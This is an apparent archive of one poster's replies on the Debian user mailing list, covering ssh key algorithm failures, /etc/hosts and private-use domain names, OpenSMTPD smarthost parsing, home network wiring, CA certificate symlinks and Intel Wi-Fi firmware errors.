> I had been able to ssh to my server without issue.  The first time it
> failed, I was using free wireless at an airport; I was able to ssh to my
> server from the hotel that morning, and maybe, the first time I tried,
> from the airport, but then subsequent ssh attempts from the airport
> failed to connect.  I mention this only because nothing had changed in
> my server's configuration when this problem began.
>
> This is a real problem for me, as a lot of my work involves sending
> files via scp between work and home.  Any suggestions about how to
> troubleshoot and hopefully fix the problem will be greatly appreciated.

In the past, I experienced similar breakages. In my case, my ISP
(Verizon) provided router updates that blew away my router config. So
I lost port forwarding to my internal servers.

I personally don't make port 22 available at the router. Instead, I
use port 1522 (first server), port 1523 (second server), etc. Then
port 1522 is forwarded to the first server on port 22, port 1523 is
forwarded to the second server on port 22, etc.

Jeff

Re: Please help me identify package so I can report an important bug

[Jeffrey Walton]

On Wed, Jun 12, 2024 at 10:33 AM Richard  wrote:
>
> Question is, does it make that much sense to report it to Debian directly? 
> Are you encountering this issue on Debian itself or 
> Armbian/Raspbian/whatever? You reported this to the Raspberry Pi GitHub, so 
> I'd expect them to take this up with the upstream devs themselves, so by the 
> time Trixie is being released, it may already be included.
>
> But besides that, what you describe in the first link sounds to me not like a 
> bug, but as a well thought-through decision. Network adapter names like eth0 
> have been dropped with Debian 11 (I think, maybe even 10). So don't get your 
> hopes up too high to ever see this coming back. But also, just searching the 
> web for this topic, you should have come across this answering your 
> questions: https://wiki.debian.org/NetworkInterfaceNames

The random MAC address discussed in the bug report (with mention of
Network Manager) could be
.

Jeff

Re: [SOLVED] Re: Debian bookworm fails to install

[Jeffrey Walton]

On Fri, Jun 7, 2024 at 1:48 PM Hans  wrote:
>
> Got it! Found the reason and a fix for it.
>
> Just not easy to find. It is an dependency-problem!
>
> What happened?
>
> Well, in ~config/mylist.list.chroot I added the package "bootcd", which shoul 
> exist in my live-system. During build this made no problems and all 
> dependencies are ok. But - during install it appears, that there is a 
> dependency conflict with the installer as bootcd needs grub-efi-amd64-bin.
>
> However, when bootcd wants to install, this package will be installed, too as 
> it is dependent. So far, so well.
>
> BUT - grub-efi-amd64-bin conflicts with grub-efi-amd64-bin-signed
>
> and forces it to deinstall,
>
> which, you guess it, the debian-installer needs.
>
> And so the grub-installer crashes!
>
> Now the question, who should be asked for help? Maintainers of bootcd? 
> Maintainers of debian-installer? Or Maintainers of packages?
>
> I do not know, and as long as I do not know, I can not file a bugreport as 
> none of them (and this is fully correct and understandable) is responsible 
> from his sight on.
>
> However, the problem can easily be reproduced.

Forgive my ignorance... How does this translate into an intermittent
problem? It seems like you would never encounter it, or always
encounter it. What makes the problem come and go?

Jeff

Re: Debian bookworm fails to install

[Jeffrey Walton]

On Fri, Jun 7, 2024 at 3:08 PM Hans  wrote:
>
> Hi folks,
>
> I am running into an issue, I can not explain.
>
> Let me please shortly describe:
>
> For my own purposes I am building a live-debian ISO with installer. As I am
> finetuning some things (not related to the system itself), I am building
> several ISOs a day.
>
> The live-build is set to bookworm (not bullseye, as lb config does).
>
> However, everything is going fine., the live-system is booting well.
>
> But: When I want to install it, the installer always breaks, when it wants to
> install grub. (grub-installer fails).
>
> As I am doing always a fresh install with completely formatting the harddrive,
> it can not be explained, why this happens.
>
> And more strange: When I build one version, it is working well. Changing
> nothing, and building again, suddenly the installer crashes at grub
> installation and then it will never work again.
>
> To declare: I can build several times, and every installation is working well,
> and suddenly without any reason, it breakes. Doing then using one version
> before (the last one, which worked well), it is still working, but the next
> build is crashing.
>
> Ok, I think you understood, what I meant. Well, one reason I could imagine,
> that the debian mirror, I add during installation process is changing. I am
> using "deb.debian.org", but when using another mirror in my near, I am running
> into the same issue.
>
> I also tried to install grub manually in the console during installation
> process, using "grub-installer /target", but this did neither work nor show
> much usefull information.
>
> Any idea, why this is happening? I saw similar messages in some forums, but
> they are all related to Debian 10, which is rather old (and I suppose, these
> bugs are fixed).

You might have a look at grub2 bugs in Bookworm, and see if any look
like they apply to you:
.

Jeff

Re: No login with Debian 12 ssh client, ssh-rsa key, Debian 8 sshd

[Jeffrey Walton]

On Fri, May 31, 2024 at 7:08 PM Thomas Schmitt  wrote:
>
> i still have network access to a Debian 8 system, to which i logged in
> from Debian 11 via ssh and a ssh-rsa key. After the upgrade to Debian 12
> ssh fails with this public key authentication.
> The probably relevant messages from a run of ssh -vvv are:
>
>   debug1: Offering public key: /home/.../.ssh/id_rsa RSA SHA256:...
>   debug1: send_pubkey_test: no mutual signature algorithm
>
> To my luck, the old sshd already supports ssh-ed25519 and i was able to
> add the content of the Debian 12 id_ed25519.pub to the Debian 8 file
> .ssh/authorized_keys2 . Now ssh to the Debian 8 machine works again.
>
> But i find this error message "no mutual signature algorithm" strange.
> The Debian 12 ssh client is obviously willing to try ssh-rsa.
> The Debian 8 sshd accepted that key from Debian 11. Why not from 12 ?
>
> In
>   https://www.openssh.com/releasenotes.html
> i find for 9.2 or older only a RequiredRSASize directive of which
> man sshd_config says the default is 1024.
> The ssh-rsa key was generated by Debian 10. man ssh-keygen of buster
> says the default of option -b with RSA was 2048.
> (Does anybody know how to analyze a key file in regard to such
> parameters ?)

If I am not mistaken, the problem you are experiencing is due to using
RSA/SHA-1 on the old machine. The RSA modulus is large enough, but the
hash is weak. That change happened at OpenSSH 8.9.

`ssh -vvv` should show the ciphers offered by the server and client.
It should look something like:

debug2: KEX algorithms: curve25519-sha256,curve25519-sha...@libssh.org,e
cdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-
sha...@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-g
roup16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha25
6,ext-info-c,kex-strict-c-...@openssh.com
debug2: host key algorithms: ssh-ed25519-cert-...@openssh.com,ecdsa-sha2
-nistp256-cert-...@openssh.com,ecdsa-sha2-nistp384-cert-...@openssh.com,
ecdsa-sha2-nistp521-cert-...@openssh.com,sk-ssh-ed25519-cert-v01@openssh
.com,sk-ecdsa-sha2-nistp256-cert-...@openssh.com,rsa-sha2-512-cert-v01@o
penssh.com,rsa-sha2-256-cert-...@openssh.com,ssh-ed25519,ecdsa-sha2-nist
p256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25...@openssh.com,
sk-ecdsa-sha2-nistp...@openssh.com,rsa-sha2-512,rsa-sha2-256

Jeff

Re: What DE to replace GNOME with?

[Jeffrey Walton]

On Fri, May 31, 2024 at 10:03 AM DdB
 wrote:
>
> while being on old-old-stable still (buster) and preparing for an
> upgrade to bookworm, i noticed, that GNOME once again lost compatibility
> to my preferred extensions, giving me a hard choice to either go on with
> my outdated system as long as possible, or find a replacement and change
> my ways of working.
>
> What i did like with GNOME was the ease of use for a handicapped person
> (like me). But i disliked the overwhelming intrusion into the os, that
> suppresses many choices and freedom.
>
> But as i am still feeling like a noob, i would like to collect some
> suggestions and comments from you guys:
> Eventually there is an alternative to the so called
> "quick-toggler-extension", that i used/exploited to generate a kind of
> personal menu, easily configured in one go with a json config file, an
> alternative on another desktop?
>
> And the other miss is the "Windows-corner-preview-extension", that is no
> longer maintained or functional, that i was using all over the place for
> many different use cases and purposes. That one also suffers from
> changes inside GNOME, that basically kill volunteers work (repeatedly!)
>
> Now is the time to plan ahead for years to come and i don't know, what i
> should do.

It looks like you have at least ten choices of desktop environments:
. I don't know if your
extensions are compatible with any of them.

MATE provides an experience similar to GNOME 2.

Jeff

Re: Anybody Skype users here?

[Jeffrey Walton]

On Thu, May 30, 2024 at 10:53 PM George at Clug  wrote:
>
>  [...]
>
> I am guessing you have tried 'Skype for Web' ?  How did you find it? If it 
> does not suite your purposes, I would like to know why, as 'Skype for Web' 
> might be a solution for myself if it works enough.
>
> https://support.microsoft.com/en-us/skype/skype-for-web-preview-your-most-asked-questions-9c4836e4-5cdb-4261-ae46-d919b974af8a
> Skype for Web (Preview) - your most asked questions
>
> I want to try the Skype for Web (Preview) experience. How do I do that?
> Please go to https://preview.web.skype.com and sign into Skype.

Skype for Web looks like it could be a good alternative for OP. It has
been around since 2019. Cf.,
.

Both the Linux app from the *.deb and the browser-based app (and other
package formats, like MSI) likely use the web security model, so you
are f**k'd with either one. There's probably no benefit to using one
over the other. Neither can provide a secure channel, and both will
happily allow interception of your calls.

Skype also points people to their community for questions:
. Maybe someone in the community
can answer the OP's questions, like what it's like to use the snap
version of the app.

Jeff

Re: "Repeaters", etc. - FRITZ!Box 7490

[Jeffrey Walton]

On Tue, May 28, 2024 at 10:43 AM Paul M Foster  wrote:
>
> On Tue, May 28, 2024 at 04:43:38AM -0400, Michael Grant wrote:
>[...]
> > To be clear, the wifi is the part that is at your property.  There are
> > some providers termed WISPs (wireless internet service providers) that
> > use wifi (not 4G/5G) to connect you to the internet.  Just being clear
> > here that even if they do this, we're not talking about extending that
> > wifi signal.  That signal (whether it's really wifi or 4G or 5G or
> > even adsl or fibre or cable), it gets terminated at or just before
> > your router in your house.  So I'm not talking about that side of your
> > connection at all.
>
> I've heard of 5G internet providers, but I'd rather avoid them. There's
> only one of those in the area we're moving to.

You also have Starlink if you are too rural to get traditional
broadband service. Starlink sends you the satellite dish and the wifi
router. Also see .

Amazon is getting ready to launch satellites for Project Kuiper, which
will compete with Starlink.

> > So if I understand properly, you have some devices around your home
> > that don't have built-in wifi and you are not going to string ethernet
> > to them.
>
> To the contrary, I *do* plan to string cat 5/6 to those devices, just not
> all the way to the modem/router, which will likely be in the garage.

This is probably a mistake. You want "home runs" back to the router or
modem. Since you only need two wireless base stations, take the time
to pull the drops for ethernet backhauls. Or hire someone to do it.
(Your on-prem cable service is most likely already pulled this way).

If you use wireless backhauls, then that robs you of bandwidth for
device data since it is being used for the backhaul.

And one other comment based on my experience... don't use the service
providers wifi modem. Disable the wifi in the service provider's modem
or router, and use two base stations that you purchase. The base
stations that you purchase will perform much better, and give you
better coverage on your site.

Jeff

Re: "Repeaters", etc. - FRITZ!Box 7490

[Jeffrey Walton]

On Tue, May 28, 2024 at 2:18 AM Paul M Foster  wrote:
>
> On Tue, May 28, 2024 at 12:43:14PM +1000, George at Clug wrote:
> [...]
> > If you had the money, I would get a cable installer to do a proper job of
> > running cables. I used to be an Electrician, hence I am familiar with
> > running wires, so in my own home I ran Ethernet cable where ever needed
> > (and we have a cavity ceiling). I am guessing this option is not possible
> > for your situation.
>
> Coincidentally, I used to be an electrician too, but we almost never ran
> low voltage except for doorbells.
>
> The house in question appears to have a generous attic, but they've blown
> in two feet of insulation I'd rather not disturb. And that much insulation
> makes the headers of walls very hard to find. Also, I'm not in my 20s
> anymore, and crawling around in attics is difficult.
>
> In the house I'm living in now, I did go into the attic years ago with cat
> 5e and wired up the living room.
>
> FWIW, in the house we're buying, I need internet (wired) in the living
> room, bedroom 2 and bedroom 4. Also, it's concrete block construction
> (outer walls).

You can also run cat5 or cat6 (or rg-6) behind baseboards:
.

Jeff

Re: "Repeaters", etc.

[Jeffrey Walton]

On Mon, May 27, 2024 at 8:13 PM Paul M Foster  wrote:
>
> At some point this year, I'm moving into a new house, and it is not wired
> for internet (WHY aren't new houses wired with Cat5/6/7?).

Your contract did not specify the house to be wired. You should have
called it out, if you wanted it.

> The local
> internet provider will likely provide a wireless router, as they all do. My
> idea is to put a device which receives wireless signal from the
> router/modem, and has an RJ45 jack in it in each room. So each room would
> have one of these, and the devices in it would be hooked to that device via
> cat 5e. I hope that's clear.
>
> I'd like to shop for such a device, but I don't know what it's called. Can
> anyone provide advice, and possibly preferred brand names? I'd appreciate

If you want to use ethernet, then you want a switch. Each room gets
wired for ethernet, and each room needs an ethernet cable. All cables
are backhauled to the switch, and the switch is plugged into the
telecom modem or router.

If you want to use wifi, then get a couple of 802.11 AC (or above)
routers. 802.11 AC provides "wifi roaming." Backhaul the wifi base
stations using ethernet to the telecom provider's modem. In this case,
you only need two ethernet cables - one for each backhaul.

802.11 AC was the first to provide wifi roaming. 802.11 AC was branded
Wifi 5. You can also use 802.11 AX, which is Wifi 6. Most (all?) of
your devices should support 802.11 AC/Wifi 5. You should check if they
support 802.11 AX, so you can learn if you can provide the 802.11
AX/Wifi 6 network.

Now, to go from the telecom company's modem or router to the telecom
company's network takes an interface device. Nowadays, that is an ONT
or Optical Network Terminal. The telecom gives (sells?) you the ONT,
too.

The ONT is the equivalent to the old twisted pair NID or Network
Interface Device. Everything inside up to the ONT or the NID is CPE or
Customer Premise Equipment. The subscriber is responsible for the CPE.
The ONT and NID outward is the responsibility of the telecom provider.

The ONT is the bridge from the house's network to the telecom's
network. The ONT can often provide both Ethernet and RG-6 cable to the
modem or router.

Jeff

Re: Address 127.0.1.1

[Jeffrey Walton]

On Fri, May 24, 2024 at 1:46 PM Greg Wooledge  wrote:
>
> On Fri, May 24, 2024 at 01:40:38PM -0400, Jeffrey Walton wrote:
> > On Fri, May 24, 2024 at 11:13 AM Paul M Foster  
> > wrote:
> > > 192.168.254.30  yosemite.mars.lan   yosemite
>
> > 127.0.1.1 is traditionally used for the fully qualified domain name
> > (fqdn). So I would expect to see 'yosemite.mars.lan', but not
> > 'yosemite'.
>
> I don't know why you would expect that.  What purpose would that serve?

Sorry I was not clear. I would expect that because 127.0.1.1 is
traditionally used for a fully qualified domain name, not a hostname.

> The goal here is for programs to be able to look up "the IP address"
> that belongs to $HOSTNAME.
>
> If the hostname is "yosemite", then "yosemite" must appear in the
> /etc/hosts file as an alias for whatever made-up FQDN is being used.
>
> This is what Paul has.  What Paul has looks quite reasonable to me.
> If 192.168.254.30 is in fact bound to an ethernet interface by a
> static configuration (e.g. /etc/network/interfaces) then I would also
> say it looks correct.
>
> > Also, fqdn's end in dot '.' to denote the top of the dns tree.
>
> Not in the /etc/hosts file, they don't.  You may be thinking of BIND
> configuration files.
>
> I've never IN MY LIFE seen trailing dots on hostnames in /etc/hosts.

Jeff

Re: Address 127.0.1.1

[Jeffrey Walton]

On Fri, May 24, 2024 at 11:13 AM Paul M Foster  wrote:
>
> Folks:
>
> In my /etc/hosts file, there's a line:
>
> 127.0.1.1 yosemite.mars.lan yosemite
>
> I think Debian put it there.
>
> Later in the file, I've got:
>
> 192.168.254.30  yosemite.mars.lan   yosemite
>
> So there are two entries for the same (my) machine. Is this a problem?
> Specifically, could it cause problems with email (Exim4 or OpenSMTPD)?

127.0.1.1 is traditionally used for the fully qualified domain name
(fqdn). So I would expect to see 'yosemite.mars.lan', but not
'yosemite'.

Also, fqdn's end in dot '.' to denote the top of the dns tree. So I
would expect to see 'yosemite.mars.lan.' (note the trailing dot), and
not 'yosemite.mars.lan' (note the lack of the trailing dot). What can
happen with 'yosemite.mars.lan' is, search domains can be added to it.
So if dhcp says 'isp.com' is a search domain, then your network stack
might make requests for 'yosemite.mars.lan.isp.com'.

Jeff

Re: OpenSMTPD can't parse smarthost

[Jeffrey Walton]

On Thu, May 23, 2024 at 2:54 PM  wrote:
>
> On Thu, May 23, 2024 at 01:50:21PM -0400, Jeffrey Walton wrote:
> > On Thu, May 23, 2024 at 12:08 PM Paul M Foster  
> > wrote:
> > >
> > > On Thu, May 23, 2024 at 12:54:31AM -0400, Jeffrey Walton wrote:
> > >[...]
> > > > Also, I think you should be using *.home.arpa, and not *.lan.
> > > > home.arpa is reserved for private use by ICANN and the IETF. I suspect
> > > > *.lan is not reserved for private use.
> > >
> > > On a LAN, you can use anything you like. I've used .mars.lan for decades
> > > with no difficulty.
> >
> > Citation, please.
>
> No need. It just works. Of course, if you have domain names
> in your LAN which also is "out there", you won't "see" both.

Perhaps that's why you _can't_ use anything you like; and that's why
you should use domains reserved for private use.

Related reading is Brand TLDs (a/k/a/ Vanity Domains) at
<https://icannwiki.org/Brand_TLD>.

> If your LAN is isolated, you can basically do whatever you
> want.

And then act surprised when networking breaks :)

> And then there are "special" TLDs (.local, I'm looking at
> you) where you'll get lots of fun effects should you decide
> to use them (zeroconf, I'm looking at you :-)

I _think_ .local is reserved for mDNS. See
<https://www.iana.org/assignments/special-use-domain-names/special-use-domain-names.xhtml>.

It looks like .internal and possibly .private are coming soon. See
<https://www.icann.org/en/public-comment/proceeding/proposed-top-level-domain-string-for-private-use-24-01-2024>
and <https://www.theregister.com/2024/01/29/icann_internal_tld/>.

Jeff

Re: OpenSMTPD can't parse smarthost

[Jeffrey Walton]

On Thu, May 23, 2024 at 12:08 PM Paul M Foster  wrote:
>
> On Thu, May 23, 2024 at 12:54:31AM -0400, Jeffrey Walton wrote:
>[...]
> > Also, I think you should be using *.home.arpa, and not *.lan.
> > home.arpa is reserved for private use by ICANN and the IETF. I suspect
> > *.lan is not reserved for private use.
>
> On a LAN, you can use anything you like. I've used .mars.lan for decades
> with no difficulty.

Citation, please.

Jeff

Re: OpenSMTPD can't parse smarthost

[Jeffrey Walton]

On Thu, May 23, 2024 at 12:43 AM Paul M Foster  wrote:
>
> Folks:
>
> Here's a shot in the dark. I've looked up and down the internet, and can't
> find a solution.
>
> I have a mini PC which just serves up videos. Daily it backs up to an
> attached drive. This happens with a script in /etc/cron.daily, which
> typically emails results to root. In my case it's aliased to me. I have
> OpenSMTPD installed with this config:
>
> ---
>
> #   $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $
>
> # This is the smtpd server system-wide configuration file.
> # See smtpd.conf(5) for more information.
>
> table aliases file:/etc/aliases
> table secrets file:/etc/secrets
>
> listen on localhost
>
> action "relay" relay host smtp+notls://pa...@yosemite.mars.lan:25 auth 
> 
>
> match from local for any action "relay"
>
> ---
>
> Note: yosemite is my desktop machine; that where I want the mail to be
> sent. "paulf" is a tag in the secrets file. Note that this connection
> between the mini PC (buckaroo) and yosemite should be a plain text
> connection, very simple. My username and password are in the secrets file.
>
> When I attempt to send a test message to check this all works (via swaks or
> mail), I get an error message in the /var/log/mail.log file which says:
>
> "warn: Failed to parse smarthost smtp+notls://pa...@yosemite.mars.lan:25"
>
> Note that the "protocol" doesn't matter. I can use "smtp" alone as the
> protocol, and it still won't parse. And yes, yosemite.mars.lan is in my
> local hosts file.

On the video server, run nslookup and see if it can resolve yosemite.mars.lan.

Looking at the string smtp+notls://pa...@yosemite.mars.lan:25, it
looks more like a url than a hostname. Maybe that is confusing your
mail agent.

Also, I think you should be using *.home.arpa, and not *.lan.
home.arpa is reserved for private use by ICANN and the IETF. I suspect
*.lan is not reserved for private use.

Jeff

Re: sanity check for /etc/ssl/certs?

[Jeffrey Walton]

On Tue, May 14, 2024 at 3:10 PM Harald Dunkel 
wrote:

> Hi folks,
>
> is there a sanity check for /etc/ssl/certs included in Bookworm?
> I've got one host with some missing symlinks in this directory, eg.
>
> root@dpcl064:/etc/ssl/certs# ls -al *SSL.com*
> ls: cannot access '*SSL.com*': No such file or directory
>

It is hard to say what is going on.

I see them in Debian Unstable:

$ find /etc/ssl/certs -iname '*ssl.com*'
/etc/ssl/certs/SSL.com_TLS_RSA_Root_CA_2022.pem
/etc/ssl/certs/SSL.com_EV_Root_Certification_Authority_RSA_R2.pem
/etc/ssl/certs/SSL.com_TLS_ECC_Root_CA_2022.pem
/etc/ssl/certs/SSL.com_Root_Certification_Authority_RSA.pem
/etc/ssl/certs/SSL.com_Root_Certification_Authority_ECC.pem
/etc/ssl/certs/SSL.com_EV_Root_Certification_Authority_ECC.pem

I don't see anything in Debian's bug reporter about removing ssl.com;
confer, .
And ssl.com is included in Mozilla and Chrome's root program.


> Other hosts show
>
> root@dpcl082:/etc/ssl/certs# ls -al *SSL.com*
> lrwxrwxrwx 1 root root 82 Jul 16  2018
> SSL.com_EV_Root_Certification_Authority_ECC.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_EV_Root_Certification_Authority_ECC.crt
> lrwxrwxrwx 1 root root 85 Jul 16  2018
> SSL.com_EV_Root_Certification_Authority_RSA_R2.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_EV_Root_Certification_Authority_RSA_R2.crt
> lrwxrwxrwx 1 root root 79 Jul 16  2018
> SSL.com_Root_Certification_Authority_ECC.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_Root_Certification_Authority_ECC.crt
> lrwxrwxrwx 1 root root 79 Jul 16  2018
> SSL.com_Root_Certification_Authority_RSA.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_Root_Certification_Authority_RSA.crt
>
> The files in /usr/share/ca-certificates are available, of course.
> The access rights seem OK. update-ca-certificates or reinstalling
> ca-certificates (with overwrite) didn't solve this problem.
>

Hazarding a guess... Have you upgraded that system over the years? That may
explain why you are seeing old artifacts and dead symlinks.

Maybe you should run `symlinks -r / | grep dangling` to locate dead
symlinks, and then run `symlink -r -d /` to delete them (once you are
satisfied with the resulting list).

Jeff

Re: OT: Top Posting

[Jeffrey Walton]

On Tue, May 14, 2024 at 2:40 PM Richard  wrote:

> You really must think of yourself as being the epitome of human creation.
> I don't see any use in continuing this nonsense. If you don't have anything
> relevant to say, this case is closed for me.
>

Who are you talking about? There are two people in the reply below.

Jeff


> Am Di., 14. Mai 2024 um 16:55 Uhr schrieb gene heskett <
> ghesk...@shentel.net>:
>
>> On 5/14/24 10:09, Richard wrote:
>> > Just because something isn't an official ISO standard doesn't mean it's
>> > not standard behavior. And how it relates to this mailing list? It's
>> > called a setting.
>> >
>> No its not, its your refusal to use the down arrow in your reply editor
>> to put your reply after the question. It really is that simple. If your
>> choice of email agents cannot do that, its time to switch to an agent
>> that can. There are dozens of them.
>>
>> > Am Di., 14. Mai 2024 um 15:57 Uhr schrieb Loris Bennett
>> > mailto:loris.benn...@fu-berlin.de>>:
>> >
>> > Hi Richard,
>> >
>> > Richard mailto:rrosn...@gmail.com>> writes:
>> >
>> >  > "Top posting" (writing the answer above the text that's being
>> replied
>> >  > to) is literally industry standard behavior.
>> >
>> > Can you provide a link to the standard you are referring to?
>> >
>> > Assuming such a standard exists, how would it apply to this
>> newsgroup?
>> >
>> > [snip (51 lines)]
>> >
>> > Cheers,
>> >
>> > Loris
>>
>> Cheers, Gene Heskett, CET.
>>
>

Re: Wifi getting disconnected randomly

[Jeffrey Walton]

On Fri, May 10, 2024 at 11:18 AM Max Nikulin  wrote:

> On 10/05/2024 22:09, Jeffrey Walton wrote:
> > On Fri, May 10, 2024 at 11:05 AM Max Nikulin wrote:
> > On 10/05/2024 06:07, Jeffrey Walton wrote:
> >  > On Thu, May 9, 2024 at 5:44 PM Unni wrote:
> >  > [  278.360447] iwlwifi :09:00.0: Microcode SW error
> detected.
> >  > Restarting 0x0.
> >  > [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> >  > 72.daa05125.0 cc-a0-72.ucode
> > [...]
> >  > Install the latest UEFI firmware for the machine, and then re-run
> > the tests.
> >
> > I do not mind that it is a useful suggestion in general and should be
> > followed, but I am curious if it has ever helped you in specific
> cases
> > of intel wifi cards.
> >
> > My bad. I was talking about the manufacturer's UEFI firmware; not a
> > linux-firmware package.
>
> I am not trying to dispute your suggestion, I had a hope to get a data
> point with a success story.
>

Hi Max.

Sorry to go off the list.

In 2006 I was doing sysadmin work for the Nuclear Energy Institute. NEI
performed a hardware refresh, and supplied ~50 employees with new Dell
laptops. I don't recall the model, but they had integrated Intel wifi. The
laptops would connect via wifi, and disconnect after about 10 minutes. Dell
support told us we needed to update the BiOS or UEFI. It fixed the problem.

About 6 months ago, I bought a used Intel NUC model NUC5PPYB. It was
running Fedora 39 at the time. A `sudo reboot && exit` over SSH would cause
the machine to hang on shutdown. I had to walk over to the machine and
cycle the power. The NUC had UEFI from 2015. I updated to the 2022 version
of the UEFI (version PYBSWCEL.86A.0081.2022.0823.1419), and the hang on
reboot was fixed. Apparently there was some problem around ACPI.

Jeff

Re: Wifi getting disconnected randomly

[Jeffrey Walton]

On Fri, May 10, 2024 at 11:05 AM Max Nikulin  wrote:

> On 10/05/2024 06:07, Jeffrey Walton wrote:
> > On Thu, May 9, 2024 at 5:44 PM Unni wrote:
> > [  278.360447] iwlwifi :09:00.0: Microcode SW error detected.
> > Restarting 0x0.
> > [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> > 72.daa05125.0 cc-a0-72.ucode
> [...]
> > Install the latest UEFI firmware for the machine, and then re-run the
> tests.
>
> I do not mind that it is a useful suggestion in general and should be
> followed, but I am curious if it has ever helped you in specific cases
> of intel wifi cards.
>

My bad. I was talking about the manufacturer's UEFI firmware; not a
linux-firmware package.

Jeff

Re: Wifi getting disconnected randomly

[Jeffrey Walton]

On Thu, May 9, 2024 at 5:44 PM Unni  wrote:

> Hello,
>
> Wifi is getting disconnected randomly on debian. dmesg shows
>
>
> --
>
> [  278.360346] iwlwifi :09:00.0: Queue 5 is stuck 8 21
> [  278.360447] iwlwifi :09:00.0: Microcode SW error detected.
> Restarting 0x0.
> [  278.360566] iwlwifi :09:00.0: Start IWL Error Log Dump:
> [  278.360568] iwlwifi :09:00.0: Transport status: 0x004A, valid: 6
> [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> 72.daa05125.0 cc-a0-72.ucode
> [  278.360573] iwlwifi :09:00.0: 0x0084 | NMI_INTERRUPT_UNKNOWN
> [  278.360576] iwlwifi :09:00.0: 0x22F0 | trm_hw_status0
> [  278.360578] iwlwifi :09:00.0: 0x0001 | trm_hw_status1
> [  278.360579] iwlwifi :09:00.0: 0x004FBE16 | branchlink2
> [  278.360581] iwlwifi :09:00.0: 0x004F23FE | interruptlink1
> [  278.360583] iwlwifi :09:00.0: 0x004F23FE | interruptlink2
> [  278.360585] iwlwifi :09:00.0: 0x5CEA | data1
> [  278.360587] iwlwifi :09:00.0: 0x0100 | data2
> [  278.360589] iwlwifi :09:00.0: 0x | data3
> [  278.360590] iwlwifi :09:00.0: 0x86C0496C | beacon time
> [  278.360592] iwlwifi :09:00.0: 0x72E106A0 | tsf low
> [  278.360594] iwlwifi :09:00.0: 0x00E2 | tsf hi
> [  278.360596] iwlwifi :09:00.0: 0x | time gp1
> [  278.360598] iwlwifi :09:00.0: 0x1009BFB7 | time gp2
> [  278.360600] iwlwifi :09:00.0: 0x0001 | uCode revision type
> [  278.360601] iwlwifi :09:00.0: 0x0048 | uCode version major
> [  278.360603] iwlwifi :09:00.0: 0xDAA05125 | uCode version minor
> [  278.360605] iwlwifi :09:00.0: 0x0340 | hw version
> [  278.360607] iwlwifi :09:00.0: 0x00C89000 | board version
> [  278.360609] iwlwifi :09:00.0: 0x8045FC0B | hcmd
> [  278.360610] iwlwifi :09:00.0: 0x0002 | isr0
> [  278.360612] iwlwifi :09:00.0: 0x | isr1
> [  278.360614] iwlwifi :09:00.0: 0x08F2 | isr2
> [  278.360616] iwlwifi :09:00.0: 0x00C3038C | isr3
> [  278.360618] iwlwifi :09:00.0: 0x | isr4
> [  278.360619] iwlwifi :09:00.0: 0x0507001C | last cmd Id
> [  278.360621] iwlwifi :09:00.0: 0x5CEA | wait_event
> [  278.360623] iwlwifi :09:00.0: 0x0080 | l2p_control
> [  278.360625] iwlwifi :09:00.0: 0x0020 | l2p_duration
> [  278.360627] iwlwifi :09:00.0: 0x003F | l2p_mhvalid
> [  278.360629] iwlwifi :09:00.0: 0x0080 | l2p_addr_match
> [  278.360630] iwlwifi :09:00.0: 0x0009 | lmpm_pmg_sel
> [  278.360632] iwlwifi :09:00.0: 0x | timestamp
> [  278.360634] iwlwifi :09:00.0: 0x70D0 | flow_handler
> [  278.360680] iwlwifi :09:00.0: Start IWL Error Log Dump:
> [  278.360682] iwlwifi :09:00.0: Transport status: 0x004A, valid: 7
> [  278.360684] iwlwifi :09:00.0: 0x2066 | NMI_INTERRUPT_HOST
> [  278.360686] iwlwifi :09:00.0: 0x | umac branchlink1
> [  278.360688] iwlwifi :09:00.0: 0x80455E3C | umac branchlink2
> [  278.360690] iwlwifi :09:00.0: 0x80472146 | umac interruptlink1
> [  278.360692] iwlwifi :09:00.0: 0x80472146 | umac interruptlink2
> [  278.360693] iwlwifi :09:00.0: 0x0100 | umac data1
> [  278.360695] iwlwifi :09:00.0: 0x80472146 | umac data2
> [  278.360697] iwlwifi :09:00.0: 0x | umac data3
> [  278.360699] iwlwifi :09:00.0: 0x0048 | umac major
> [  278.360701] iwlwifi :09:00.0: 0xDAA05125 | umac minor
> [  278.360702] iwlwifi :09:00.0: 0x1009BFB5 | frame pointer
> [  278.360704] iwlwifi :09:00.0: 0xC0886264 | stack pointer
> [  278.360706] iwlwifi :09:00.0: 0x00E8019C | last host cmd
> [  278.360708] iwlwifi :09:00.0: 0x | isr status reg
> [  278.360722] iwlwifi :09:00.0: IML/ROM dump:
> [  278.360724] iwlwifi :09:00.0: 0x0003 | IML/ROM error/state
> [  278.360738] iwlwifi :09:00.0: 0x578F | IML/ROM data1
> [  278.360752] iwlwifi :09:00.0: 0x0080 | IML/ROM WFPM_AUTH_KEY_0
> [  278.360761] iwlwifi :09:00.0: Fseq Registers:
> [  278.360765] iwlwifi :09:00.0: 0x6000 | FSEQ_ERROR_CODE
> [  278.360770] iwlwifi :09:00.0: 0x00290021 | FSEQ_TOP_INIT_VERSION
> [  278.360775] iwlwifi :09:00.0: 0x00050008 | FSEQ_CNVIO_INIT_VERSION
> [  278.360780] iwlwifi :09:00.0: 0xA503 | FSEQ_OTP_VERSION
> [  278.360785] iwlwifi :09:00.0: 0x8003 | FSEQ_TOP_CONTENT_VERSION
> [  278.360790] iwlwifi :09:00.0: 0x4552414E | FSEQ_ALIVE_TOKEN
> [  278.360794] iwlwifi :09:00.0: 0x00100530 | FSEQ_CNVI_ID
> [  278.360799] iwlwifi :09:00.0: 0x0532 | FSEQ_CNVR_ID
> [  278.360804] iwlwifi :09:00.0: 0x00100530 | CNVI_AUX_MISC_CHIP
> [  278.360811] iwlwifi :09:00.0: 0x0532 | CNVR_AUX_MISC_CHIP
> [  278.360818] iwlwifi :09:00.0: 0x05B0905B |
> CNVR_SCU_SD_REGS_SD_REG_DIG_DCDC_VTRIM
